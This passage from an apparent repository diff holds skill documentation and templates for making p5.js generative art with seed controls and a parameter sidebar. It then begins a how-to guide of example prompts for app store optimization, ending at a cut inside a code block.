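  currentSeed = currentSeed >= SEED_MAX ? SEED_MIN : currentSeed + 1;
  return currentSeed;
}
function prevSeed() {
  currentSeed = currentSeed <= SEED_MIN ? SEED_MAX : currentSeed - 1;
  return currentSeed;
}
function randomSeedInRange() {
  currentSeed = SEED_MIN + Math.floor(Math.random() * (SEED_MAX - SEED_MIN + 1));
  return currentSeed;
}
// Jump handler: input fields hand back strings, so parse and clamp.
function jumpToSeed(input) {
  const n = parseInt(input, 10);
  if (!Number.isNaN(n)) currentSeed = Math.min(SEED_MAX, Math.max(SEED_MIN, n));
  return currentSeed;
}
```

In the artifact, each handler would be followed by re-seeding (`randomSeed`/`noiseSeed`) and a regenerate call so the canvas reflects the new seed.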

**3. Single Artifact Structure**

```html
<!DOCTYPE html>
<html>
<head>
  <!-- p5.js from CDN - always available -->
  <script src="https://cdnjs.cloudflare.com/ajax/libs/p5.js/1.7.0/p5.min.js"></script>
  <style>
    /* All styling inline - clean, minimal */
    /* Canvas on top, controls below */
  </style>
</head>
<body>
  <div id="canvas-container"></div>
  <div id="controls">
    <!-- All parameter controls -->
  </div>
  <script>
    // ALL p5.js code inline here
    // Parameter objects, classes, functions
    // setup() and draw()
    // UI handlers
    // Everything self-contained
  </script>
</body>
</html>
```

**CRITICAL**: This is a single artifact. No external files, no imports (except the p5.js CDN). Everything inline.

**4. Implementation Details - BUILD THE SIDEBAR**

The sidebar structure:

**1. Seed (FIXED)** - Always include exactly as shown:

- Seed display
- Prev/Next/Random/Jump buttons

**2. Parameters (VARIABLE)** - Create controls for the art:

```html
<div class="control-group">
  <label>Parameter Name</label>
  <input type="range" id="param" min="..." max="..." step="..." value="..." oninput="updateParam('param', this.value)">
  <span class="value-display" id="param-value">...</span>
</div>
```

Add as many control-group divs as there are parameters.
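
A common pitfall when wiring `oninput` is that `this.value` arrives as a string. A hedged sketch of an `updateParam` that coerces and echoes the value (the DOM lookup assumes the `param-value` id convention shown above; the guard keeps it runnable outside a browser):

```javascript
let params = { noiseScale: 0.01 }; // example parameter

// Slider handler: coerce the string value, store it, echo it to the UI.
function updateParam(name, value) {
  params[name] = Number(value); // <input> values are strings
  const display = typeof document !== 'undefined'
    ? document.getElementById(name + '-value')
    : null;
  if (display) display.textContent = params[name];
  // then: redraw() for cheap params, or a full regenerate for structural ones
  return params[name];
}
```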

**3. Colors (OPTIONAL/VARIABLE)** - Include if the art needs adjustable colors:

- Add color pickers if users should control the palette
- Skip this section if the art uses fixed colors
- Skip it if the art is monochrome

**4. Actions (FIXED)** - Always include exactly as shown:

- Regenerate button
- Reset button
- Download PNG button

**Requirements**:

- Seed controls must work (prev/next/random/jump/display)
- All parameters must have UI controls
- The Regenerate, Reset, and Download buttons must work
- Keep Anthropic branding (UI styling, not art colors)

### USING THE ARTIFACT

The HTML artifact works immediately:

1. **In claude.ai**: Displayed as an interactive artifact - runs instantly
2. **As a file**: Save it and open it in any browser - no server needed
3. **Sharing**: Send the HTML file - it's completely self-contained

---

## VARIATIONS & EXPLORATION

The artifact includes seed navigation by default (prev/next/random buttons), allowing users to explore variations without creating multiple files. If the user wants specific variations highlighted:

- Include seed presets (buttons for "Variation 1: Seed 42", "Variation 2: Seed 127", etc.)
- Add a "Gallery Mode" that shows thumbnails of multiple seeds side by side
- Keep everything within the same single artifact
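
Seed presets and a gallery are just data plus a loop. A sketch (the preset labels and seeds here are invented for illustration; the actual seeds would be hand-picked favorites):

```javascript
// Hypothetical presets - seeds invented for illustration only.
const presets = [
  { label: 'Variation 1', seed: 42 },
  { label: 'Variation 2', seed: 127 },
];

// Seeds 1..100 for a gallery grid of thumbnails.
function gallerySeeds(count = 100) {
  return Array.from({ length: count }, (_, i) => i + 1);
}
```

Gallery Mode would iterate `gallerySeeds()`, rendering each seed to a small offscreen canvas for its thumbnail.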

This is like creating a series of prints from the same plate - the algorithm is consistent, but each seed reveals different facets of its potential. The interactive nature means users discover their own favorites by exploring the seed space.

---

## THE CREATIVE PROCESS

**User request** → **Algorithmic philosophy** → **Implementation**

Each request is unique. The process involves:

1. **Interpret the user's intent** - What aesthetic is being sought?
2. **Create an algorithmic philosophy** (4-6 paragraphs) describing the computational approach
3. **Implement it in code** - Build the algorithm that expresses this philosophy
4. **Design appropriate parameters** - What should be tunable?
5. **Build matching UI controls** - Sliders/inputs for those parameters

**The constants**:

- Anthropic branding (colors, fonts, layout)
- Seed navigation (always present)
- Self-contained HTML artifact

**Everything else is variable**:

- The algorithm itself
- The parameters
- The UI controls
- The visual outcome

To achieve the best results, trust creativity and let the philosophy guide the implementation.

---

## RESOURCES

This skill includes helpful templates and documentation:

- **templates/viewer.html**: REQUIRED STARTING POINT for all HTML artifacts.
  - This is the foundation - it contains the exact structure and Anthropic branding
  - **Keep unchanged**: Layout structure, sidebar organization, Anthropic colors/fonts, seed controls, action buttons
  - **Replace**: The p5.js algorithm, parameter definitions, and UI controls in the Parameters section
  - The extensive comments in the file mark exactly what to keep vs replace
- **templates/generator_template.js**: Reference for p5.js best practices and code-structure principles.
  - Shows how to organize parameters, use seeded randomness, and structure classes
  - NOT a pattern menu - use these principles to build unique algorithms
  - Embed algorithms inline in the HTML artifact (don't create separate .js files)

**Critical reminders**:

- The **template is the STARTING POINT**, not inspiration
- The **algorithm is where to create** something unique
- Don't copy the flow-field example - build what the philosophy demands
- But DO keep the exact UI structure and Anthropic branding from the template
223
skills/algorithmic-art/templates/generator_template.js
Normal file
@@ -0,0 +1,223 @@
/**
 * ═══════════════════════════════════════════════════════════════════════════
 * P5.JS GENERATIVE ART - BEST PRACTICES
 * ═══════════════════════════════════════════════════════════════════════════
 *
 * This file shows STRUCTURE and PRINCIPLES for p5.js generative art.
 * It does NOT prescribe what art you should create.
 *
 * Your algorithmic philosophy should guide what you build.
 * These are just best practices for how to structure your code.
 *
 * ═══════════════════════════════════════════════════════════════════════════
 */

// ============================================================================
// 1. PARAMETER ORGANIZATION
// ============================================================================
// Keep all tunable parameters in one object.
// This makes it easy to:
// - Connect to UI controls
// - Reset to defaults
// - Serialize/save configurations

let params = {
  // Define parameters that match YOUR algorithm.
  // Examples (customize for your art):
  // - Counts: how many elements (particles, circles, branches, etc.)
  // - Scales: size, speed, spacing
  // - Probabilities: likelihood of events
  // - Angles: rotation, direction
  // - Colors: palette arrays

  seed: 12345,
  // Define colorPalette as an array - choose whatever colors you'd like,
  // e.g. ['#d97757', '#6a9bcc', '#788c5d', '#b0aea5']
  // Add YOUR parameters here based on your algorithm
};

// ============================================================================
// 2. SEEDED RANDOMNESS (Critical for reproducibility)
// ============================================================================
// ALWAYS use seeded random for Art Blocks-style reproducible output.

function initializeSeed(seed) {
  randomSeed(seed);
  noiseSeed(seed);
  // Now all random() and noise() calls will be deterministic
}

// ============================================================================
// 3. P5.JS LIFECYCLE
// ============================================================================

function setup() {
  createCanvas(800, 800);

  // Initialize the seed first
  initializeSeed(params.seed);

  // Set up your generative system.
  // This is where you initialize:
  // - Arrays of objects
  // - Grid structures
  // - Initial positions
  // - Starting states

  // For static art: call noLoop() at the end of setup.
  // For animated art: let draw() keep running.
}

function draw() {
  // Option 1: Static generation (runs once, then stops)
  // - Generate everything in setup()
  // - Call noLoop() in setup()
  // - draw() doesn't do much, or can be empty

  // Option 2: Animated generation (continuous)
  // - Update your system each frame
  // - Common patterns: particle movement, growth, evolution
  // - Can optionally call noLoop() after N frames

  // Option 3: User-triggered regeneration
  // - Use noLoop() by default
  // - Call redraw() when parameters change
}

// ============================================================================
// 4. CLASS STRUCTURE (When you need objects)
// ============================================================================
// Use classes when your algorithm involves multiple entities.
// Examples: particles, agents, cells, nodes, etc.

class Entity {
  constructor() {
    // Initialize entity properties.
    // Use random() here - it will be seeded.
  }

  update() {
    // Update entity state.
    // This might involve:
    // - Physics calculations
    // - Behavioral rules
    // - Interactions with neighbors
  }

  display() {
    // Render the entity.
    // Keep rendering logic separate from update logic.
  }
}

// ============================================================================
// 5. PERFORMANCE CONSIDERATIONS
// ============================================================================

// For large numbers of elements:
// - Pre-calculate what you can
// - Use simple collision detection (spatial hashing if needed)
// - Limit expensive operations (sqrt, trig) when possible
// - Use p5 vectors efficiently

// For smooth animation:
// - Aim for 60fps
// - Profile if things are slow
// - Consider reducing particle counts or simplifying calculations

// ============================================================================
// 6. UTILITY FUNCTIONS
// ============================================================================

// Color utilities
function hexToRgb(hex) {
  const result = /^#?([a-f\d]{2})([a-f\d]{2})([a-f\d]{2})$/i.exec(hex);
  return result ? {
    r: parseInt(result[1], 16),
    g: parseInt(result[2], 16),
    b: parseInt(result[3], 16)
  } : null;
}

function colorFromPalette(index) {
  return params.colorPalette[index % params.colorPalette.length];
}

// Mapping and easing
function mapRange(value, inMin, inMax, outMin, outMax) {
  return outMin + (outMax - outMin) * ((value - inMin) / (inMax - inMin));
}

function easeInOutCubic(t) {
  return t < 0.5 ? 4 * t * t * t : 1 - Math.pow(-2 * t + 2, 3) / 2;
}

// Wrap a value into [0, max) for toroidal bounds.
// A modular wrap preserves the overshoot instead of snapping to the edge.
function wrapAround(value, max) {
  return ((value % max) + max) % max;
}

// ============================================================================
// 7. PARAMETER UPDATES (Connect to UI)
// ============================================================================

function updateParameter(paramName, value) {
  params[paramName] = value;
  // Decide if you need to regenerate or just update.
  // Some params can update in real time; others need full regeneration.
}

function regenerate() {
  // Reinitialize your generative system.
  // Useful when parameters change significantly.
  initializeSeed(params.seed);
  // Then regenerate your system.
}

// ============================================================================
// 8. COMMON P5.JS PATTERNS
// ============================================================================

// Drawing with transparency for trails/fading
function fadeBackground(opacity) {
  fill(250, 249, 245, opacity); // Anthropic light with alpha
  noStroke();
  rect(0, 0, width, height);
}

// Using noise for organic variation
function getNoiseValue(x, y, scale = 0.01) {
  return noise(x * scale, y * scale);
}

// Creating vectors from angles
function vectorFromAngle(angle, magnitude = 1) {
  return createVector(cos(angle), sin(angle)).mult(magnitude);
}

// ============================================================================
// 9. EXPORT FUNCTIONS
// ============================================================================

function exportImage() {
  saveCanvas('generative-art-' + params.seed, 'png');
}

// ============================================================================
// REMEMBER
// ============================================================================
//
// These are TOOLS and PRINCIPLES, not a recipe.
// Your algorithmic philosophy should guide WHAT you create.
// This structure helps you create it WELL.
//
// Focus on:
// - Clean, readable code
// - Parameterized for exploration
// - Seeded for reproducibility
// - Performant execution
//
// The art itself is entirely up to you!
//
// ============================================================================
599
skills/algorithmic-art/templates/viewer.html
Normal file
@@ -0,0 +1,599 @@
<!DOCTYPE html>
|
||||||
|
<!--
|
||||||
|
THIS IS A TEMPLATE THAT SHOULD BE USED EVERY TIME AND MODIFIED.
|
||||||
|
WHAT TO KEEP:
|
||||||
|
✓ Overall structure (header, sidebar, main content)
|
||||||
|
✓ Anthropic branding (colors, fonts, layout)
|
||||||
|
✓ Seed navigation section (always include this)
|
||||||
|
✓ Self-contained artifact (everything inline)
|
||||||
|
|
||||||
|
WHAT TO CREATIVELY EDIT:
|
||||||
|
✗ The p5.js algorithm (implement YOUR vision)
|
||||||
|
✗ The parameters (define what YOUR art needs)
|
||||||
|
✗ The UI controls (match YOUR parameters)
|
||||||
|
|
||||||
|
Let your philosophy guide the implementation.
|
||||||
|
The world is your oyster - be creative!
|
||||||
|
-->
|
||||||
|
<html lang="en">
|
||||||
|
<head>
|
||||||
|
<meta charset="UTF-8">
|
||||||
|
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
||||||
|
<title>Generative Art Viewer</title>
|
||||||
|
<script src="https://cdnjs.cloudflare.com/ajax/libs/p5.js/1.7.0/p5.min.js"></script>
|
||||||
|
<link rel="preconnect" href="https://fonts.googleapis.com">
|
||||||
|
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
|
||||||
|
<link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;500;600&family=Lora:wght@400;500&display=swap" rel="stylesheet">
|
||||||
|
<style>
|
||||||
|
/* Anthropic Brand Colors */
|
||||||
|
:root {
|
||||||
|
--anthropic-dark: #141413;
|
||||||
|
--anthropic-light: #faf9f5;
|
||||||
|
--anthropic-mid-gray: #b0aea5;
|
||||||
|
--anthropic-light-gray: #e8e6dc;
|
||||||
|
--anthropic-orange: #d97757;
|
||||||
|
--anthropic-blue: #6a9bcc;
|
||||||
|
--anthropic-green: #788c5d;
|
||||||
|
}
|
||||||
|
|
||||||
|
* {
|
||||||
|
margin: 0;
|
||||||
|
padding: 0;
|
||||||
|
box-sizing: border-box;
|
||||||
|
}
|
||||||
|
|
||||||
|
body {
|
||||||
|
font-family: 'Poppins', sans-serif;
|
||||||
|
background: linear-gradient(135deg, var(--anthropic-light) 0%, #f5f3ee 100%);
|
||||||
|
min-height: 100vh;
|
||||||
|
color: var(--anthropic-dark);
|
||||||
|
}
|
||||||
|
|
||||||
|
.container {
|
||||||
|
display: flex;
|
||||||
|
min-height: 100vh;
|
||||||
|
padding: 20px;
|
||||||
|
gap: 20px;
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Sidebar */
|
||||||
|
.sidebar {
|
||||||
|
width: 320px;
|
||||||
|
flex-shrink: 0;
|
||||||
|
background: rgba(255, 255, 255, 0.95);
|
||||||
|
backdrop-filter: blur(10px);
|
||||||
|
padding: 24px;
|
||||||
|
border-radius: 12px;
|
||||||
|
box-shadow: 0 10px 30px rgba(20, 20, 19, 0.1);
|
||||||
|
overflow-y: auto;
|
||||||
|
overflow-x: hidden;
|
||||||
|
}
|
||||||
|
|
||||||
|
.sidebar h1 {
|
||||||
|
font-family: 'Lora', serif;
|
||||||
|
font-size: 24px;
|
||||||
|
font-weight: 500;
|
||||||
|
color: var(--anthropic-dark);
|
||||||
|
margin-bottom: 8px;
|
||||||
|
}
|
||||||
|
|
||||||
|
.sidebar .subtitle {
|
||||||
|
color: var(--anthropic-mid-gray);
|
||||||
|
font-size: 14px;
|
||||||
|
margin-bottom: 32px;
|
||||||
|
line-height: 1.4;
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Control Sections */
|
||||||
|
.control-section {
|
||||||
|
margin-bottom: 32px;
|
||||||
|
}
|
||||||
|
|
||||||
|
.control-section h3 {
|
||||||
|
font-size: 16px;
|
||||||
|
font-weight: 600;
|
||||||
|
color: var(--anthropic-dark);
|
||||||
|
margin-bottom: 16px;
|
||||||
|
display: flex;
|
||||||
|
align-items: center;
|
||||||
|
gap: 8px;
|
||||||
|
}
|
||||||
|
|
||||||
|
.control-section h3::before {
|
||||||
|
content: '•';
|
||||||
|
color: var(--anthropic-orange);
|
||||||
|
font-weight: bold;
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Seed Controls */
|
||||||
|
.seed-input {
|
||||||
|
width: 100%;
|
||||||
|
background: var(--anthropic-light);
|
||||||
|
padding: 12px;
|
||||||
|
border-radius: 8px;
|
||||||
|
font-family: 'Courier New', monospace;
|
||||||
|
font-size: 14px;
|
||||||
|
margin-bottom: 12px;
|
||||||
|
border: 1px solid var(--anthropic-light-gray);
|
||||||
|
text-align: center;
|
||||||
|
}
|
||||||
|
|
||||||
|
.seed-input:focus {
|
||||||
|
outline: none;
|
||||||
|
border-color: var(--anthropic-orange);
|
||||||
|
box-shadow: 0 0 0 2px rgba(217, 119, 87, 0.1);
|
||||||
|
background: white;
|
||||||
|
}
|
||||||
|
|
||||||
|
.seed-controls {
|
||||||
|
display: grid;
|
||||||
|
grid-template-columns: 1fr 1fr;
|
||||||
|
gap: 8px;
|
||||||
|
margin-bottom: 8px;
|
||||||
|
}
|
||||||
|
|
||||||
|
.regen-button {
|
||||||
|
margin-bottom: 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Parameter Controls */
|
||||||
|
.control-group {
|
||||||
|
margin-bottom: 20px;
|
||||||
|
}
|
||||||
|
|
||||||
|
.control-group label {
|
||||||
|
display: block;
|
||||||
|
font-size: 14px;
|
||||||
|
font-weight: 500;
|
||||||
|
color: var(--anthropic-dark);
|
||||||
|
margin-bottom: 8px;
|
||||||
|
}
|
||||||
|
|
||||||
|
.slider-container {
|
||||||
|
display: flex;
|
||||||
|
align-items: center;
|
||||||
|
gap: 12px;
|
||||||
|
}
|
||||||
|
|
||||||
|
.slider-container input[type="range"] {
|
||||||
|
flex: 1;
|
||||||
|
height: 4px;
|
||||||
|
background: var(--anthropic-light-gray);
|
||||||
|
border-radius: 2px;
|
||||||
|
outline: none;
|
||||||
|
-webkit-appearance: none;
|
||||||
|
}
|
||||||
|
|
||||||
|
.slider-container input[type="range"]::-webkit-slider-thumb {
|
||||||
|
-webkit-appearance: none;
|
||||||
|
width: 16px;
|
||||||
|
height: 16px;
|
||||||
|
background: var(--anthropic-orange);
|
||||||
|
border-radius: 50%;
|
||||||
|
cursor: pointer;
|
||||||
|
transition: all 0.2s ease;
|
||||||
|
}
|
||||||
|
|
||||||
|
.slider-container input[type="range"]::-webkit-slider-thumb:hover {
|
||||||
|
transform: scale(1.1);
|
||||||
|
background: #c86641;
|
||||||
|
}
|
||||||
|
|
||||||
|
.slider-container input[type="range"]::-moz-range-thumb {
|
||||||
|
width: 16px;
|
    height: 16px;
    background: var(--anthropic-orange);
    border-radius: 50%;
    border: none;
    cursor: pointer;
    transition: all 0.2s ease;
}

.value-display {
    font-family: 'Courier New', monospace;
    font-size: 12px;
    color: var(--anthropic-mid-gray);
    min-width: 60px;
    text-align: right;
}

/* Color Pickers */
.color-group {
    margin-bottom: 16px;
}

.color-group label {
    display: block;
    font-size: 12px;
    color: var(--anthropic-mid-gray);
    margin-bottom: 4px;
}

.color-picker-container {
    display: flex;
    align-items: center;
    gap: 8px;
}

.color-picker-container input[type="color"] {
    width: 32px;
    height: 32px;
    border: none;
    border-radius: 6px;
    cursor: pointer;
    background: none;
    padding: 0;
}

.color-value {
    font-family: 'Courier New', monospace;
    font-size: 12px;
    color: var(--anthropic-mid-gray);
}

/* Buttons */
.button {
    background: var(--anthropic-orange);
    color: white;
    border: none;
    padding: 10px 16px;
    border-radius: 6px;
    font-size: 14px;
    font-weight: 500;
    cursor: pointer;
    transition: all 0.2s ease;
    width: 100%;
}

.button:hover {
    background: #c86641;
    transform: translateY(-1px);
}

.button:active {
    transform: translateY(0);
}

.button.secondary {
    background: var(--anthropic-blue);
}

.button.secondary:hover {
    background: #5a8bb8;
}

.button.tertiary {
    background: var(--anthropic-green);
}

.button.tertiary:hover {
    background: #6b7b52;
}

.button-row {
    display: flex;
    gap: 8px;
}

.button-row .button {
    flex: 1;
}

/* Canvas Area */
.canvas-area {
    flex: 1;
    display: flex;
    align-items: center;
    justify-content: center;
    min-width: 0;
}

#canvas-container {
    width: 100%;
    max-width: 1000px;
    border-radius: 12px;
    overflow: hidden;
    box-shadow: 0 20px 40px rgba(20, 20, 19, 0.1);
    background: white;
}

#canvas-container canvas {
    display: block;
    width: 100% !important;
    height: auto !important;
}

/* Loading State */
.loading {
    display: flex;
    align-items: center;
    justify-content: center;
    font-size: 18px;
    color: var(--anthropic-mid-gray);
}

/* Responsive - Stack on mobile */
@media (max-width: 600px) {
    .container {
        flex-direction: column;
    }

    .sidebar {
        width: 100%;
    }

    .canvas-area {
        padding: 20px;
    }
}
</style>
</head>
<body>
    <div class="container">
        <!-- Control Sidebar -->
        <div class="sidebar">
            <!-- Headers (CUSTOMIZE THIS FOR YOUR ART) -->
            <h1>TITLE - EDIT</h1>
            <div class="subtitle">SUBHEADER - EDIT</div>

            <!-- Seed Section (ALWAYS KEEP THIS) -->
            <div class="control-section">
                <h3>Seed</h3>
                <input type="number" id="seed-input" class="seed-input" value="12345" onchange="updateSeed()">
                <div class="seed-controls">
                    <button class="button secondary" onclick="previousSeed()">← Prev</button>
                    <button class="button secondary" onclick="nextSeed()">Next →</button>
                </div>
                <button class="button tertiary regen-button" onclick="randomSeedAndUpdate()">↻ Random</button>
            </div>

            <!-- Parameters Section (CUSTOMIZE THIS FOR YOUR ART) -->
            <div class="control-section">
                <h3>Parameters</h3>

                <!-- Particle Count -->
                <div class="control-group">
                    <label>Particle Count</label>
                    <div class="slider-container">
                        <input type="range" id="particleCount" min="1000" max="10000" step="500" value="5000" oninput="updateParam('particleCount', this.value)">
                        <span class="value-display" id="particleCount-value">5000</span>
                    </div>
                </div>

                <!-- Flow Speed -->
                <div class="control-group">
                    <label>Flow Speed</label>
                    <div class="slider-container">
                        <input type="range" id="flowSpeed" min="0.1" max="2.0" step="0.1" value="0.5" oninput="updateParam('flowSpeed', this.value)">
                        <span class="value-display" id="flowSpeed-value">0.5</span>
                    </div>
                </div>

                <!-- Noise Scale -->
                <div class="control-group">
                    <label>Noise Scale</label>
                    <div class="slider-container">
                        <input type="range" id="noiseScale" min="0.001" max="0.02" step="0.001" value="0.005" oninput="updateParam('noiseScale', this.value)">
                        <span class="value-display" id="noiseScale-value">0.005</span>
                    </div>
                </div>

                <!-- Trail Length -->
                <div class="control-group">
                    <label>Trail Length</label>
                    <div class="slider-container">
                        <input type="range" id="trailLength" min="2" max="20" step="1" value="8" oninput="updateParam('trailLength', this.value)">
                        <span class="value-display" id="trailLength-value">8</span>
                    </div>
                </div>
            </div>

            <!-- Colors Section (OPTIONAL - CUSTOMIZE OR REMOVE) -->
            <div class="control-section">
                <h3>Colors</h3>

                <!-- Color 1 -->
                <div class="color-group">
                    <label>Primary Color</label>
                    <div class="color-picker-container">
                        <input type="color" id="color1" value="#d97757" onchange="updateColor('color1', this.value)">
                        <span class="color-value" id="color1-value">#d97757</span>
                    </div>
                </div>

                <!-- Color 2 -->
                <div class="color-group">
                    <label>Secondary Color</label>
                    <div class="color-picker-container">
                        <input type="color" id="color2" value="#6a9bcc" onchange="updateColor('color2', this.value)">
                        <span class="color-value" id="color2-value">#6a9bcc</span>
                    </div>
                </div>

                <!-- Color 3 -->
                <div class="color-group">
                    <label>Accent Color</label>
                    <div class="color-picker-container">
                        <input type="color" id="color3" value="#788c5d" onchange="updateColor('color3', this.value)">
                        <span class="color-value" id="color3-value">#788c5d</span>
                    </div>
                </div>
            </div>

            <!-- Actions Section (ALWAYS KEEP THIS) -->
            <div class="control-section">
                <h3>Actions</h3>
                <div class="button-row">
                    <button class="button" onclick="resetParameters()">Reset</button>
                </div>
            </div>
        </div>

        <!-- Main Canvas Area -->
        <div class="canvas-area">
            <div id="canvas-container">
                <div class="loading">Initializing generative art...</div>
            </div>
        </div>
    </div>

<script>
// ═══════════════════════════════════════════════════════════════════════
// GENERATIVE ART PARAMETERS - CUSTOMIZE FOR YOUR ALGORITHM
// ═══════════════════════════════════════════════════════════════════════

let params = {
    seed: 12345,
    particleCount: 5000,
    flowSpeed: 0.5,
    noiseScale: 0.005,
    trailLength: 8,
    colorPalette: ['#d97757', '#6a9bcc', '#788c5d']
};

// Store defaults for reset; copy the palette array too, so later color
// edits can't mutate the saved defaults through the shared reference.
let defaultParams = {...params, colorPalette: [...params.colorPalette]};

// ═══════════════════════════════════════════════════════════════════════
// P5.JS GENERATIVE ART ALGORITHM - REPLACE WITH YOUR VISION
// ═══════════════════════════════════════════════════════════════════════

let particles = [];
let flowField = [];
let cols, rows;
let scl = 10; // Flow field resolution

function setup() {
    let canvas = createCanvas(1200, 1200);
    canvas.parent('canvas-container');

    initializeSystem();

    // Remove loading message
    document.querySelector('.loading').style.display = 'none';
}

function initializeSystem() {
    // Seed the randomness for reproducibility
    randomSeed(params.seed);
    noiseSeed(params.seed);

    // Clear particles and recreate
    particles = [];

    // Initialize particles
    for (let i = 0; i < params.particleCount; i++) {
        particles.push(new Particle());
    }

    // Calculate flow field dimensions
    cols = floor(width / scl);
    rows = floor(height / scl);

    // Generate flow field
    generateFlowField();

    // Clear background
    background(250, 249, 245); // Anthropic light background
}

function generateFlowField() {
    // fill this in
}

function draw() {
    // fill this in
}

// ═══════════════════════════════════════════════════════════════════════
// PARTICLE SYSTEM - CUSTOMIZE FOR YOUR ALGORITHM
// ═══════════════════════════════════════════════════════════════════════

class Particle {
    constructor() {
        // fill this in
    }
    // fill this in
}

// ═══════════════════════════════════════════════════════════════════════
// UI CONTROL HANDLERS - CUSTOMIZE FOR YOUR PARAMETERS
// ═══════════════════════════════════════════════════════════════════════

function updateParam(paramName, value) {
    // fill this in
}

function updateColor(colorId, value) {
    // fill this in
}

// ═══════════════════════════════════════════════════════════════════════
// SEED CONTROL FUNCTIONS - ALWAYS KEEP THESE
// ═══════════════════════════════════════════════════════════════════════

function updateSeedDisplay() {
    document.getElementById('seed-input').value = params.seed;
}

function updateSeed() {
    let input = document.getElementById('seed-input');
    let newSeed = parseInt(input.value, 10);
    if (newSeed && newSeed > 0) {
        params.seed = newSeed;
        initializeSystem();
    } else {
        // Reset to current seed if invalid
        updateSeedDisplay();
    }
}

function previousSeed() {
    params.seed = Math.max(1, params.seed - 1);
    updateSeedDisplay();
    initializeSystem();
}

function nextSeed() {
    params.seed = params.seed + 1;
    updateSeedDisplay();
    initializeSystem();
}

function randomSeedAndUpdate() {
    params.seed = Math.floor(Math.random() * 999999) + 1;
    updateSeedDisplay();
    initializeSystem();
}

function resetParameters() {
    // Restore defaults (fresh palette copy, for the same reason as above)
    params = {...defaultParams, colorPalette: [...defaultParams.colorPalette]};

    // Update UI elements
    document.getElementById('particleCount').value = params.particleCount;
    document.getElementById('particleCount-value').textContent = params.particleCount;
    document.getElementById('flowSpeed').value = params.flowSpeed;
    document.getElementById('flowSpeed-value').textContent = params.flowSpeed;
    document.getElementById('noiseScale').value = params.noiseScale;
    document.getElementById('noiseScale-value').textContent = params.noiseScale;
    document.getElementById('trailLength').value = params.trailLength;
    document.getElementById('trailLength-value').textContent = params.trailLength;

    // Reset colors
    document.getElementById('color1').value = params.colorPalette[0];
    document.getElementById('color1-value').textContent = params.colorPalette[0];
    document.getElementById('color2').value = params.colorPalette[1];
    document.getElementById('color2-value').textContent = params.colorPalette[1];
    document.getElementById('color3').value = params.colorPalette[2];
    document.getElementById('color3-value').textContent = params.colorPalette[2];

    updateSeedDisplay();
    initializeSystem();
}

// Initialize UI on load
window.addEventListener('load', function() {
    updateSeedDisplay();
});
</script>
</body>
</html>
281
skills/app-store-optimization/HOW_TO_USE.md
Normal file
@@ -0,0 +1,281 @@
# How to Use the App Store Optimization Skill

Hey Claude—I just added the "app-store-optimization" skill. Can you help me optimize my app's presence on the App Store and Google Play?

## Example Invocations

### Keyword Research

**Example 1: Basic Keyword Research**
```
Hey Claude—I just added the "app-store-optimization" skill. Can you research the best keywords for my productivity app? I'm targeting professionals who need task management and team collaboration features.
```

**Example 2: Competitive Keyword Analysis**
```
Hey Claude—I just added the "app-store-optimization" skill. Can you analyze keywords that Todoist, Asana, and Monday.com are using? I want to find gaps and opportunities for my project management app.
```

### Metadata Optimization

**Example 3: Optimize App Title**
```
Hey Claude—I just added the "app-store-optimization" skill. Can you optimize my app title for the Apple App Store? My app is called "TaskFlow" and I want to rank for "task manager", "productivity", and "team collaboration". The title needs to be under 30 characters.
```

**Example 4: Full Metadata Package**
```
Hey Claude—I just added the "app-store-optimization" skill. Can you create optimized metadata for both Apple App Store and Google Play Store? Here's my app info:
- Name: TaskFlow
- Category: Productivity
- Key features: AI task prioritization, team collaboration, calendar integration
- Target keywords: task manager, productivity app, team tasks
```

### Competitor Analysis

**Example 5: Analyze Top Competitors**
```
Hey Claude—I just added the "app-store-optimization" skill. Can you analyze the ASO strategies of the top 5 productivity apps in the App Store? I want to understand their title strategies, keyword usage, and visual asset approaches.
```

**Example 6: Identify Competitive Gaps**
```
Hey Claude—I just added the "app-store-optimization" skill. Can you compare my app's ASO performance against competitors and identify what I'm missing? Here's my current metadata: [paste metadata]
```

### ASO Score Calculation

**Example 7: Calculate Overall ASO Health**
```
Hey Claude—I just added the "app-store-optimization" skill. Can you calculate my app's ASO health score? Here are my metrics:
- Average rating: 4.2 stars
- Total ratings: 3,500
- Keywords in top 10: 3
- Keywords in top 50: 12
- Conversion rate: 4.5%
```
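For intuition, here is one way metrics like those in Example 7 could roll up into a 0-100 health score. The category weights, normalization caps, and the assumption of fully optimized metadata are illustrative choices for this sketch, not the skill's actual formula:

```python
# Illustrative ASO health score: a weighted blend of the four categories the
# skill reports. All weights and caps below are assumptions for demonstration.

def aso_health_score(avg_rating, total_ratings, top10, top50, conversion_rate):
    # Rating quality plus rating volume (capped at 10,000 ratings)
    ratings = min(avg_rating / 5.0, 1.0) * 0.7 + min(total_ratings / 10000, 1.0) * 0.3
    # Keyword visibility: top-10 positions weighted more than top-50
    keywords = min(top10 / 10, 1.0) * 0.6 + min(top50 / 50, 1.0) * 0.4
    # Conversion: treat 10%+ impression-to-install as excellent
    conversion = min(conversion_rate / 0.10, 1.0)
    metadata = 1.0  # assume fully optimized metadata for this example
    score = 100 * (0.25 * metadata + 0.30 * ratings + 0.25 * keywords + 0.20 * conversion)
    return round(score)

# Metrics from Example 7: 4.2 stars, 3,500 ratings, 3 top-10, 12 top-50, 4.5% conversion
print(aso_health_score(4.2, 3500, 3, 12, 0.045))  # → 62
```

Whatever the exact weights, the structure is the same: each category is normalized to 0-1, weighted, and summed, which is why improving the weakest category usually moves the overall score the most.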

**Example 8: Identify Improvement Areas**
```
Hey Claude—I just added the "app-store-optimization" skill. My ASO score is 62/100. Can you tell me which areas I should focus on first to improve my rankings and downloads?
```

### A/B Testing

**Example 9: Plan Icon Test**
```
Hey Claude—I just added the "app-store-optimization" skill. I want to A/B test two different app icons. My current conversion rate is 5%. Can you help me plan the test, calculate required sample size, and determine how long to run it?
```

**Example 10: Analyze Test Results**
```
Hey Claude—I just added the "app-store-optimization" skill. Can you analyze my A/B test results?
- Variant A (control): 2,500 visitors, 125 installs
- Variant B (new icon): 2,500 visitors, 150 installs
Is this statistically significant? Should I implement variant B?
```
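For a quick sanity check of results like these, a standard two-proportion z-test can be run with nothing but the Python standard library. This sketches the statistics involved; the skill's own significance analysis may use a different method:

```python
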